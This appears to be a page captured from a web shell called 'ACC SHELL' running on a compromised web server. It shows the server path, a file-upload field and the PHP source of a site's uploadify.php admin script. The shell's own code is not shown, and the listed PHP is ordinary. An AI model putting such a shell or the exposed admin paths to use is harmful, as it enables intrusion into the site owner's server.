ACC SHELL

Path : /srv/www/vhosts/eqnxde/
File Upload :
Current File : /srv/www/vhosts/eqnxde/uploadify.php

<?php
include "lib/class.mysql.php";
include "lib/class.sablony.php";
include "lib/class.funkce.php";
include "lib/class.admin.php";
include "lib/class.jpeg.php";
include "lib/session.php";
include "lib/function.php";
include "lib/config.php";

$page->connect();
if (!empty($_SERVER['PATH_INFO'])) {
	$prom = explode ("/",$_SERVER['PATH_INFO']);
	$pocet = count($prom);
}

$page -> GenAdmin(12,$prom,"");


$page -> close();  

echo $page -> end;

?>

ACC SHELL 2018